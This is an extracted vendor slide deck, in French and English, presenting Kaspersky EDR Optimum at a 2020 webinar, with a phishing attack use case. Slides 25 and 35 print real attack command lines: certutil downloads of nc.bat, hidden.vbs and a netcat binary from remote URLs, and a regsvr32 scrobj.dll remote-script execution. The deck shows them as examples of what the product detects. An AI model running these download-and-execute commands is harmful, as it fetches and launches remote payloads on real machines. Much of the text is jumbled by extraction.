Vous êtes sur la page 1sur 40

Kaspersky EDR

Optimum

Khaled SANAA, CISSP

PreSales Manager
North, West and Central Africa
Evénement Digital - Jeudi 19 novembre 2020
2

1. Défis actuels
2. Renforcement de la défense des

Agenda terminaux
3. Présentation d'EDR Optimum
4. Cas d'utilisation EDR Optimum
5. Intégration de la solution de sécurité des
terminaux
Défis actuels
E n viro n n e m e n t à risq u e s d 'a u jo u rd 'h u i 4

E xp lo ita tio n d 'o u tils


lé g itim e s e t d e m e n a ce s F U R T IV E S E T L e s e n tre p ris e s re co n n a is s e n t :
D IFieF rICà ILd Ee sM fin
s a n s fich E Ns T D É T E C TA B L E S
m a lve illa n te s L 'a u g m e n ta tio n d u n o m b re
L e s e n tre p ris e s s o n t lu cra tive s d e m e n a ce s
p o u r le s a tta q u a n ts (p a r e x.
p o p u la rité d e s ra n s o m w a re s ) F O R T IM P A C T L a co m p le xité cro is s a n te d e s
s cé n a rio s d 'a tta q u e

C h a în e d e fra p p e à p lu s ie u rs L 'im p a ct fin a n cie r d e s m e n a ce s


p h a s e s , m u ltip le s ité ra tio n s CO M PLE XE S E T
d e s p h a se s P E R S IS TA N T E S L e s p ro b lè m e s d e co n fo rm ité
q u i d o ive n t ê tre g é ré s
Pénétration 1 – Faille
Exécution – Au niveau local
d'exploitation associée

Id e n tifica tio n
et te sts Exécution – À distance In c id e n t

Propagation 1 – E-mail

Pénétration 2 – Point d'eau Propagation 2 – Réseau


(« watering hole »)
Les défis organisationnels actuels 5

…malgré la pénurie
Toute entreprise doit être en mondiale de personnel
mesure de stopper les et d'expertise dans le
menaces complexes… domaine de la sécurité 70 %
informatique

des entreprises ont du mal à


recruter du personnel qualifié à
de nombreux postes liés à la
Lorsque les ressources sont limitées, les entreprises doivent : sécurité informatique*

 Exploiter au maximum l'automatisation


 Utiliser des ressources précieuses pour l'activité à valeur ajoutée
 Ajouter des fonctionnalités supplémentaires pour affronter l'environnement à
risques actuel
 Recruter du personnel interne pour prendre en charge les services gérés
* Source : Cybersecurity Through the CISO's Eyes, PERSPECTIVES ON A ROLE, 451Research, 2019
Menaces et contre-mesures 6

CAMPAGNES CIBLÉES ET 3
CYBERARMES 0,1 % Mettre l'accent sur les enquêtes
APPROCHE DE
approfondies, la recherche
CYBERSÉCURITÉ
manuelle et automatisée des
INTÉGRÉE
menaces
Expertise complète
MENACES AVANCÉES ET
ATTAQUES CIBLÉES
9,9 % 2
Mettre l'accent sur la neutralisation
des menaces complexes ayant DÉFENSE AVANCÉE
échappé à la technologie préventive

Une équipe en développement, composée d


ENVIRONNEMENT À professionnels de la sécurité informatique
RISQUES ÉTENDU
(DONT LES
1

90
MENACES SANS
FICHIER) Mettre l'accent sur le
blocage du plus grand BASES DE LA
% nombre de menaces
possible
SÉCURITÉ

Service informatique uniquement,


ou manque d'expertise en matière
de sécurité informatique
Première étape :
renforcer la défense de
vos terminaux
La protection des terminaux compte

76 % v

Élément le plus vulnérable et


principal point d'entrée dans
l'infrastructure informatique
de tous les événements de
Lorsque les critères de blocage sont sécurité enregistrés sont générés
insuffisants, il s'agit d'une source clé de par les terminaux
Terminaux données pour une enquête efficace sur
l'incident
Accent mis sur les terminaux en raison de
l'adoption de TLS 1.3 (difficulté à décrypter
le trafic réseau)
84 % v

plus d'un serveur ou d'un poste de


Source : enquête SANS de 2018 « Endpoint Protection and Response »
travail est impliqué(e) dans l'incident
Quelques problématiques client

Expertise insuffisante
Que faire lorsqu'on ne dispose pas
de spécialistes de la sécurité dédiés
et qualifiés ?

Contraintes budgétaires Complexité accrue


Que faire lorsque le budget pour une Consoles d'administration/agents
solution EDR professionnelle est multiples
insuffisant ?

Automatisation
Quel est le niveau
d'automatisation ? Capacité à
rechercher des événements
similaires ?
Pourquoi avons-nous besoin d'un nouveau niveau de protection des terminaux ?

Car les adversaires sont toujours


plus sophistiqués

 Besoin impératif d'aller plus loin dans la prévention automatique des problèmes de
sécurité : il est essentiel que les attaques conçues pour contourner les contrôles EPP soient
correctement analysées et fassent l'objet d'enquêtes.

 En effectuant une analyse efficace de la télémétrie du terminal, l'équipe de sécurité


informatique obtient un panorama complet sur l'incident, et peut prendre des décisions
éclairées relatives aux réponses tout en respectant les exigences réglementaires.

Quelle solution est nécessaire ?


Endpoint Detection and
Response
Offre Kaspersky : approche basée sur la maturité 11

Manque d'experts dédiés à la Développement de l'expertise


sécurité en cours Pratiques de sécurité établies

Kaspersky
Sandbox

Plate-forme
Kaspersky Endpoint Kaspersky Anti
Security for
Business Kaspersky E Targeted Attack

DR Optimum Kaspersky EDR


Expert

• Service informatique • Sécurité des informations liée au • Département de sécurité au


• Sécurité liée au département informatique département informatique complet
• Entreprises dotées de postes distants avec • Département de sécurité réduit • SOC/CERT/CSIRT
ou sans experts dédiés à la sécurité sur site • Aucun plan pour recruter davantage • Groupe de recherche des menace
d'experts en sécurité
Présentation d'EDR
Optimum
Kaspersky EDR Optimum 13

Chemin de diffusion d'attaque


Objectifs clés :

• Offrir plus de visibilité sur les Génération


incidents Analyse des
d'indicateurs de
vecteurs
Compromissions
d’attaques
• Réduire les frais généraux liés au personnalisés et
automatisés
déploiement d'une solution

• Fournir un outil d‘investigations


simple Informations Réponse
détaillées sur automatisée et en
l'incident « un seul clic »
• Proposer une réponse rapide aux
menaces complexes et difficilement
détectables avant que d'autres
dommages puissent survenir Peu exigeant et
efficace
Visib ilité e t ca p a cité d 'a n a lyse 14

Visu a lisa tio n d u ch e m in d 'a tta q u e -


lie r to u s le s é v é n e m e n ts * a s s o cié s à
l'in cid e n t
• Détection des menaces EPP
• Injection de code
• Processus générant d'autres processus
• Création de fichier D e scrip tio n d é ta illé e d e s
Connexion réseau

• Modification de registre
a rte fa cts d a n s la ca rte
d 'in fo rm a tio n s s u r l'in cid e n t p o u r
l'a n a lys e d e s ca u s e s p ro fo n d e s

C a p a cité à id e n tifie r to u s le s s e rve u rs


e t p o s te s d e tra va il a ffe cté s

* L'agent EDR ne partage pas toutes les données de télémétrie avec KSC ; uniquement les
données détaillées pertinentes et nécessaires à l'analyse des causes profondes
Avantages pour les clients KES existants 15

Kaspersky
Sandbox
Utiliser la fonctionnalité
Sandbox/EDR au sein
d'un agent logiciel déjà
installé
Coût total de possession réduit
EDR KES
grâce à une gestion des incidents
simplifiée, des coûts de
maintenance minimisés et une
intervention humaine minimale
Console unifiée : KSC Web
dispose d'une console
d'administration centralisée
(sur site et cloud)
Informations sur les incidents et exécution de processus dans EDR Optimum
16

Actions rapides :
• Isolation
• Rechercher des incidents
similaires
• Empêcher l'exécution du fichier

Lancer le mappage d'exécution

Artefacts d'incident
Informations sur les incidents et exécution de processus dans EDR Optimum
17
Informations sur les incidents et exécution de processus dans EDR Optimum
18
Regroupement d'événements par catégories (processus, registre, etc.)
19
Liste des événements liés aux incidents
20
Procédures de réponse simplifiées 21
Mesures d'intervention
multiples
• Isolement de l'hôte
• Exécuter une analyse antivirus de l'hôte
• Supprimer/mettre en quarantaine le fichier
• Mettre fin au processus
• Obtenir le fichier


Empêcher l'exécution du fichier
Ajouter le fichier à la liste blanche
Génération d'indicateurs de
KES/l'envoyer à Kaspersky pour analyse compromissions automatisés et
personnalisés, avec la capacité
• Importation externe des indicateurs
(fournisseurs de Threat
d'appliquer des réponses automatisées
Intelligence/organismes de sur plusieurs terminaux
réglementation)
• Analyse de l'infrastructure planifiée et en
temps réel basée sur les indicateurs,
avec la capacité de répondre en « un seul
clic » Lorsqu'une activité suspecte est
détectée, EDR Optimum peut
rechercher des événements
similaires sur d'autres hôtes

* OpenIOC
Choisir des indicateurs de menaces personnalisés et des options de réponse
22
Cas d'utilisation EDR
Optimum
Cas d'utilisation
24
Ransomware (détecté et
Recevoir et ouvrir un Ouvrir le fichier HTA et
bloqué)
email de phishing exécuter un script
contenant une URL vers VBA/Powershell qui +
un fichier *.hta télécharge des applications Composant C&C
depuis Internet (non détecté – aucune
signature/réputation
disponible)

Identifier la source directe de Ajouter une


l'infection persistance pour le
composant C&C Serveur C2
x.x.x.x

• Générer des indicateurs de


Voir les autres parties de l'attaque : menaces et analyser les
postes de travail à la
• Exécution de fichier/processus
recherche de signes
• Communication avec le serveur C2 d'attaques
distant
• Isoler l'hôte/empêcher
l'exécution/supprimer le
fichier, etc.
Kaspersky EDR Optimum Use Case
25

User receives a phishing e-mail and runs


a *.lnk file attached

%COMSPEC% /c start "" certutil -


urlcache -split -f
https://bit.ly/32q2VYG %Temp%/nc.bat
& certutil -urlcache -split -f
https://bit.ly/2HRvNjd
%Temp%/hidden.vbs &
regsvr32.exe /s /u
/i:https://bit.ly/3997g4Q scrobj.dll
Kaspersky EDR Optimum Use Case
26

Malicious object detected by


Behavior Detection component

C:\Users\x\AppData\Local\Temp\nc.
bat

PDM:Trojan.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
27

Process terminated
C:\Windows\System32\cmd.exe

PDM:Trojan.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
28

Create a backup of copy

C:\Users\x\AppData\Local\Temp\nc.
bat

PDM:Trojan.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
29

Delete object (in Registry)

HKU\S-21-2340907207-2926435276-
2185104821-
1001\Software\Microsoft\Windows\Curre
ntVersion\RunOnce\XSample

PDM:Trojan.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
30

Delete object

C:\Users\x\AppData\Local\Temp\nc.b
at

PDM:Trojan.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
31

Object cannot be removed

C:\Users\AppData\Local\Temp\nc.bat

PDM.Exploit.Win32.Generic.nblk
Kaspersky EDR Optimum Use Case
32

Meanwhile.. A *.json file is being formed by Kaspersky


Endpoint Agent - contains metadata to be
shared with KSC
Kaspersky EDR Optimum - Incident information card
33
Kaspersky EDR Optimum - Incident information card
34
Kaspersky EDR Optimum - Incident information card
35

copy %windir%\system32\certutil.exe %temp%\cr.tmp

%temp%\cr.tmp -urlcache -split -f


https://github.com/inwestallis/first_repository/raw/master/nc64.exe %Temp%\nc.exe
Intégration de la solution
de sécurité des
terminaux
Une vision intégrée de la sécurité des terminaux 37
Détonation d'objet suspect dans
Techniques un environnement isolé
Visibilité sur tous d'anti-évasion
les terminaux
Mise en cache de la
réputation d'un objet
Analyse des
causes Kaspersky Sandbox
profondes Réponse automatisée
EDR Optimum
via des diagnostics
Analyse manuelle et envoyés à EPP
automatique pour les
indicateurs de Crée un
menaces Kaspersky Security indicateur de
Gamme de mesures Center compromission
d'intervention d'objet à des fins
de balayage

Détection à l'aide de Renforcement


techniques avancées, Kaspersky étendu
notamment la détection
comportementale
Endpoint Security

Gestion des
Protection des
vulnérabilités et des
données
correctifs
Proposition intégrée pour le marché grand public 38

Détection comportementale Visibilité sur l'ensemble


et machine learning des terminaux

Contrôle adaptatif Analyse des causes


des anomalies profondes automatisée
Protection contre les failles
d'exploitation et les Recherche de preuves
menaces sans fichier de la menace
CONSOLE UNIFIÉE
Analyse des vulnérabilités et Analyse dynamique
gestion des correctifs approfondie (détection
sandbox automatique)
Moteur de remédiation
Gamme de mesures
d'intervention

Automatisation maximale Fonctionnement simplifié


Prix et distinctions 2019 39

Kaspersky Endpoint Security Prix AAA SE Labs


NSS Labs : Advanced Endpoint Protection
v.3 : recommandé

SE Labs a testé toute une gamme de produits de


sécurité des terminaux contre des attaques ciblées
Meilleur résultat au test de protection contre les utilisant des techniques bien établies.
menaces sans fichier Les produits Kaspersky ont été reconnus comme
étant les plus efficaces pour la détection et/ou la
protection en temps réel.

Kaspersky a participé au second tour de l'évaluation


MITRE (APT29, Cozy Bear, The Dukes)

Leader du Market
Quadrant de Radicati :
Endpoint Security Leader du rapport Forrester Wave : Visionnaires du Market
suites Endpoint Security Quadrant de Gartner en
matière de solutions EPP
Merci !
Des questions ?

Vous aimerez peut-être aussi